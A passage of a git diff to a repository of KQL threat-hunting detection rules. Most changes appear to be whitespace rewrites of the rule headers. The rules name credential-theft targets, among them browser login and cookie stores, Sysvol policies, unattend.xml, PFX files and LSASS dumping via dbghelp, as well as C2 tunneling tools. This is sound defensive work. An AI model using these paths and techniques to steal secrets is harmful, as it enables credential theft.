runaction:0" +// After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences. +// Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours +// If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002, detection.threat-hunting +// False Positives: +// - If Action1 is among the approved software in your environment, you might find that this is a noisy query. See description for ideas on how to alter this query and start looking for suspicious activities. + +DeviceProcessEvents | where (FolderPath contains "\\Windows\\Action1\\package_downloads\\" and InitiatingProcessFolderPath endswith "\\action1_agent.exe") or ((InitiatingProcessCommandLine contains "\\Action1\\scripts\\Run_Command_" or InitiatingProcessCommandLine contains "\\Action1\\scripts\\Run_PowerShell_") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe")) or FolderPath endswith "\\agent1_remote.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql index 41c8032f..8765c14f 100644 --- a/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql +++ b/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql @@ -1,12 +1,12 @@ -// Title: VsCode Code Tunnel Execution File Indicator -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-25 -// Level: medium -// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, detection.threat-hunting -// False Positives: -// - Legitimate usage of VsCode tunneling functionality will also trigger this - -DeviceFileEvents +// Title: VsCode Code Tunnel Execution File Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-25 +// Level: medium +// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, detection.threat-hunting +// False Positives: +// - Legitimate usage of VsCode tunneling functionality will also trigger this + +DeviceFileEvents | where FolderPath endswith "\\code_tunnel.json" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql index e03e9d3c..1c745702 100644 --- a/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql +++ b/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql @@ -1,17 +1,17 @@ -// Title: Access To Browser Credential Files By Uncommon Applications -// Author: frack113, X__Junior (Nextron Systems) -// Date: 2022-04-09 -// Level: low -// Description: Detects file access requests to browser credential stores by uncommon processes. -// Could indicate potential attempt of credential stealing. -// Requires heavy baselining before usage -// MITRE Tactic: Credential Access -// Tags: attack.t1003, attack.credential-access, detection.threat-hunting -// False Positives: -// - Antivirus, Anti-Spyware, Anti-Malware Software -// - Backup software -// - Legitimate software installed on partitions other than "C:\" -// - Searching software such as "everything.exe" - -DeviceFileEvents +// Title: Access To Browser Credential Files By Uncommon Applications +// Author: frack113, X__Junior (Nextron Systems) +// Date: 2022-04-09 +// Level: low +// Description: Detects file access requests to browser credential stores by uncommon processes. +// Could indicate potential attempt of credential stealing. +// Requires heavy baselining before usage +// MITRE Tactic: Credential Access +// Tags: attack.t1003, attack.credential-access, detection.threat-hunting +// False Positives: +// - Antivirus, Anti-Spyware, Anti-Malware Software +// - Backup software +// - Legitimate software installed on partitions other than "C:\" +// - Searching software such as "everything.exe" + +DeviceFileEvents | where ((FileName contains "\\User Data\\Default\\Login Data" or FileName contains "\\User Data\\Local State") or (FileName endswith "\\cookies.sqlite" or FileName endswith "\\places.sqlite" or FileName endswith "release\\key3.db" or FileName endswith "release\\key4.db" or FileName endswith "release\\logins.json") or FileName endswith "\\Appdata\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not((((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql index 838ce0d9..2ae80180 100644 --- a/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql +++ b/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql @@ -1,16 +1,16 @@ -// Title: Access To Chromium Browsers Sensitive Files By Uncommon Applications -// Author: X__Junior (Nextron Systems) -// Date: 2024-07-29 -// Level: low -// Description: Detects file access requests to chromium based browser sensitive files by uncommon processes. -// Could indicate potential attempt of stealing sensitive information. -// MITRE Tactic: Credential Access -// Tags: attack.t1003, attack.credential-access, detection.threat-hunting -// False Positives: -// - Antivirus, Anti-Spyware, Anti-Malware Software -// - Backup software -// - Legitimate software installed on partitions other than "C:\" -// - Searching software such as "everything.exe" - -DeviceFileEvents +// Title: Access To Chromium Browsers Sensitive Files By Uncommon Applications +// Author: X__Junior (Nextron Systems) +// Date: 2024-07-29 +// Level: low +// Description: Detects file access requests to chromium based browser sensitive files by uncommon processes. +// Could indicate potential attempt of stealing sensitive information. +// MITRE Tactic: Credential Access +// Tags: attack.t1003, attack.credential-access, detection.threat-hunting +// False Positives: +// - Antivirus, Anti-Spyware, Anti-Malware Software +// - Backup software +// - Legitimate software installed on partitions other than "C:\" +// - Searching software such as "everything.exe" + +DeviceFileEvents | where (FileName contains "\\User Data\\Default\\Cookies" or FileName contains "\\User Data\\Default\\History" or FileName contains "\\User Data\\Default\\Network\\Cookies" or FileName contains "\\User Data\\Default\\Web Data") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql b/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql index 8ee6547c..bf68304c 100644 --- a/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql +++ b/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql @@ -1,10 +1,10 @@ -// Title: Access To Sysvol Policies Share By Uncommon Process -// Author: frack113 -// Date: 2023-12-21 -// Level: medium -// Description: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.006, detection.threat-hunting - -DeviceFileEvents +// Title: Access To Sysvol Policies Share By Uncommon Process +// Author: frack113 +// Date: 2023-12-21 +// Level: medium +// Description: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.006, detection.threat-hunting + +DeviceFileEvents | where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and FileName startswith "\\") and (not((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql b/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql index cf376a66..0bbcb478 100644 --- a/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql +++ b/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql @@ -1,15 +1,15 @@ -// Title: Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process -// Author: Perez Diego (@darkquassar), oscd.community, Ecco -// Date: 2019-10-27 -// Level: medium -// Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process. -// The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. -// As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. -// Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001, detection.threat-hunting -// False Positives: -// - Debugging scripts might leverage this DLL in order to dump process memory for further analysis. - -DeviceImageLoadEvents +// Title: Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process +// Author: Perez Diego (@darkquassar), oscd.community, Ecco +// Date: 2019-10-27 +// Level: medium +// Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process. +// The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. +// As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. +// Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001, detection.threat-hunting +// False Positives: +// - Debugging scripts might leverage this DLL in order to dump process memory for further analysis. + +DeviceImageLoadEvents | where ((FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll") and (InitiatingProcessFolderPath endswith "\\bash.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\dnx.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\monitoringhost.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\regsvcs.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\sc.exe" or InitiatingProcessFolderPath endswith "\\scriptrunner.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not((((InitiatingProcessCommandLine endswith "-k LocalServiceNetworkRestricted" or InitiatingProcessCommandLine endswith "-k WerSvcGroup") and InitiatingProcessFolderPath endswith "\\svchost.exe") or ((InitiatingProcessCommandLine contains "/d srrstr.dll,ExecuteScheduledSPPCreation" or InitiatingProcessCommandLine contains "aepdu.dll,AePduRunUpdate" or InitiatingProcessCommandLine contains "shell32.dll,OpenAs_RunDL" or InitiatingProcessCommandLine contains "Windows.Storage.ApplicationData.dll,CleanupTemporaryState") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (InitiatingProcessCommandLine endswith "\\TiWorker.exe -Embedding" and InitiatingProcessCommandLine startswith "C:\\WINDOWS\\WinSxS\\")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql b/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql index a0066c20..30269d98 100644 --- a/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql +++ b/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql @@ -1,12 +1,12 @@ -// Title: EventLog Query Requests By Builtin Utilities -// Author: Ali Alwashali, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-11-20 -// Level: medium -// Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc. -// MITRE Tactic: Credential Access -// Tags: attack.t1552, attack.credential-access, detection.threat-hunting -// False Positives: -// - Legitimate log access by administrators or troubleshooting tools - -DeviceProcessEvents +// Title: EventLog Query Requests By Builtin Utilities +// Author: Ali Alwashali, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-20 +// Level: medium +// Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc. +// MITRE Tactic: Credential Access +// Tags: attack.t1552, attack.credential-access, detection.threat-hunting +// False Positives: +// - Legitimate log access by administrators or troubleshooting tools + +DeviceProcessEvents | where (ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog ") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql b/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql index e49ecfba..8e57d44c 100644 --- a/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql +++ b/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql @@ -1,23 +1,23 @@ -// Title: PFX File Creation -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-05-02 -// Level: low -// Description: Detects the creation of PFX files (Personal Information Exchange format). -// PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to: -// - Exfiltrate digital certificates for impersonation or signing malicious code -// - Establish persistent access through certificate-based authentication -// - Bypass security controls that rely on certificate validation -// Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.004, detection.threat-hunting -// False Positives: -// - System administrators legitimately managing certificates and PKI infrastructure -// - Development environments where developers create test certificates for application signing -// - Automated certificate deployment tools and scripts used in enterprise environments -// - Software installation processes that include certificate provisioning (e.g., web servers, VPN clients) -// - Certificate backup and recovery operations performed by IT staff -// - Build systems and CI/CD pipelines that generate code signing certificates -// - Third-party applications that create temporary certificates for secure communications - -DeviceFileEvents +// Title: PFX File Creation +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: low +// Description: Detects the creation of PFX files (Personal Information Exchange format). +// PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to: +// - Exfiltrate digital certificates for impersonation or signing malicious code +// - Establish persistent access through certificate-based authentication +// - Bypass security controls that rely on certificate validation +// Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.004, detection.threat-hunting +// False Positives: +// - System administrators legitimately managing certificates and PKI infrastructure +// - Development environments where developers create test certificates for application signing +// - Automated certificate deployment tools and scripts used in enterprise environments +// - Software installation processes that include certificate provisioning (e.g., web servers, VPN clients) +// - Certificate backup and recovery operations performed by IT staff +// - Build systems and CI/CD pipelines that generate code signing certificates +// - Third-party applications that create temporary certificates for secure communications + +DeviceFileEvents | where FolderPath endswith ".pfx" and (not((FolderPath startswith "C:\\Program Files\\CMake\\" or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe")) and FolderPath endswith "\\OneDrive\\CodeSigning.pfx") or (FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql b/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql index bcae8b3a..da9ac05f 100644 --- a/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql +++ b/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential Password Reconnaissance Via Findstr.EXE -// Author: Josh Nickels -// Date: 2023-05-18 -// Level: medium -// Description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting - -DeviceProcessEvents +// Title: Potential Password Reconnaissance Via Findstr.EXE +// Author: Josh Nickels +// Date: 2023-05-18 +// Level: medium +// Description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting + +DeviceProcessEvents | where (ProcessCommandLine contains "contraseña" or ProcessCommandLine contains "hasło" or ProcessCommandLine contains "heslo" or ProcessCommandLine contains "parola" or ProcessCommandLine contains "passe" or ProcessCommandLine contains "passw" or ProcessCommandLine contains "senha" or ProcessCommandLine contains "senord" or ProcessCommandLine contains "密碼") and (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql b/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql index 7893ac39..a83b7774 100644 --- a/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql +++ b/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql @@ -1,11 +1,11 @@ -// Title: Unattend.XML File Access Attempt -// Author: frack113 -// Date: 2024-07-22 -// Level: low -// Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored. -// This file is used during the unattended windows install process. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting - -DeviceFileEvents +// Title: Unattend.XML File Access Attempt +// Author: frack113 +// Date: 2024-07-22 +// Level: low +// Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored. +// This file is used during the unattended windows install process. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting + +DeviceFileEvents | where FileName endswith "\\Panther\\unattend.xml" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql index fd5762fa..4def8a05 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql @@ -1,12 +1,12 @@ -// Title: Access To .Reg/.Hive Files By Uncommon Applications -// Author: frack113 -// Date: 2023-09-15 -// Level: low -// Description: Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups. -// MITRE Tactic: Defense Evasion -// Tags: attack.t1112, attack.defense-evasion, attack.persistence, detection.threat-hunting -// False Positives: -// - Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required. - -DeviceFileEvents +// Title: Access To .Reg/.Hive Files By Uncommon Applications +// Author: frack113 +// Date: 2023-09-15 +// Level: low +// Description: Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups. +// MITRE Tactic: Defense Evasion +// Tags: attack.t1112, attack.defense-evasion, attack.persistence, detection.threat-hunting +// False Positives: +// - Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required. + +DeviceFileEvents | where (FileName endswith ".hive" or FileName endswith ".reg") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql index 09dbf8fb..3987d66e 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql @@ -1,17 +1,17 @@ -// Title: Access To Windows Outlook Mail Files By Uncommon Applications -// Author: frack113 -// Date: 2024-05-10 -// Level: low -// Description: Detects file access requests to Windows Outlook Mail by uncommon processes. -// Could indicate potential attempt of credential stealing. -// Requires heavy baselining before usage -// MITRE Tactic: Defense Evasion -// Tags: attack.t1070.008, attack.defense-evasion, detection.threat-hunting -// False Positives: -// - Antivirus, Anti-Spyware, Anti-Malware Software -// - Backup software -// - Legitimate software installed on partitions other than "C:\" -// - Searching software such as "everything.exe" - -DeviceFileEvents +// Title: Access To Windows Outlook Mail Files By Uncommon Applications +// Author: frack113 +// Date: 2024-05-10 +// Level: low +// Description: Detects file access requests to Windows Outlook Mail by uncommon processes. +// Could indicate potential attempt of credential stealing. +// Requires heavy baselining before usage +// MITRE Tactic: Defense Evasion +// Tags: attack.t1070.008, attack.defense-evasion, detection.threat-hunting +// False Positives: +// - Antivirus, Anti-Spyware, Anti-Malware Software +// - Backup software +// - Legitimate software installed on partitions other than "C:\" +// - Searching software such as "everything.exe" + +DeviceFileEvents | where (FileName contains "\\AppData\\Local\\Comms\\Unistore\\data" or FileName endswith "\\AppData\\Local\\Comms\\UnistoreDB\\store.vol") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not((((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\") or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql b/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql index 79bc3f45..1b7df97c 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql @@ -1,12 +1,12 @@ -// Title: ADS Zone.Identifier Deleted -// Author: frack113 -// Date: 2023-09-04 -// Level: low -// Description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004, detection.threat-hunting -// False Positives: -// - Likely - -DeviceFileEvents +// Title: ADS Zone.Identifier Deleted +// Author: frack113 +// Date: 2023-09-04 +// Level: low +// Description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004, detection.threat-hunting +// False Positives: +// - Likely + +DeviceFileEvents | where FolderPath endswith ":Zone.Identifier" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql b/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql index 0e137233..8b9686a4 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql @@ -1,12 +1,12 @@ -// Title: Amsi.DLL Load By Uncommon Process -// Author: frack113 -// Date: 2023-03-12 -// Level: low -// Description: Detects loading of Amsi.dll by uncommon processes -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.impact, attack.t1490, detection.threat-hunting -// False Positives: -// - Legitimate third party apps installed in "ProgramData" and "AppData" might generate some false positives. Apply additional filters accordingly - -DeviceImageLoadEvents +// Title: Amsi.DLL Load By Uncommon Process +// Author: frack113 +// Date: 2023-03-12 +// Level: low +// Description: Detects loading of Amsi.dll by uncommon processes +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1490, detection.threat-hunting +// False Positives: +// - Legitimate third party apps installed in "ProgramData" and "AppData" might generate some false positives. Apply additional filters accordingly + +DeviceImageLoadEvents | where FolderPath endswith "\\amsi.dll" and (not((((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and InitiatingProcessFolderPath endswith "\\ngentask.exe") or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon64.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\") or isnull(InitiatingProcessFolderPath)))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and InitiatingProcessFolderPath endswith "\\MsMpEng.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql index 52b3cc90..32083fcb 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql @@ -1,13 +1,13 @@ -// Title: BITS Client BitsProxy DLL Loaded By Uncommon Process -// Author: UnicornOfHunt -// Date: 2025-06-04 -// Level: low -// Description: Detects an uncommon process loading the "BitsProxy.dll". This DLL is used when the BITS COM instance or API is used. -// This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1197, detection.threat-hunting -// False Positives: -// - Allowed binaries in the environment that do BITS Jobs - -DeviceImageLoadEvents +// Title: BITS Client BitsProxy DLL Loaded By Uncommon Process +// Author: UnicornOfHunt +// Date: 2025-06-04 +// Level: low +// Description: Detects an uncommon process loading the "BitsProxy.dll". This DLL is used when the BITS COM instance or API is used. +// This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, detection.threat-hunting +// False Positives: +// - Allowed binaries in the environment that do BITS Jobs + +DeviceImageLoadEvents | where FolderPath endswith "\\BitsProxy.dll" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\aitstatic.exe", "C:\\Windows\\System32\\bitsadmin.exe", "C:\\Windows\\System32\\desktopimgdownldr.exe", "C:\\Windows\\System32\\DeviceEnroller.exe", "C:\\Windows\\System32\\MDMAppInstaller.exe", "C:\\Windows\\System32\\ofdeploy.exe", "C:\\Windows\\System32\\RecoveryDrive.exe", "C:\\Windows\\System32\\Speech_OneCore\\common\\SpeechModelDownload.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\OneDriveSetup.exe", 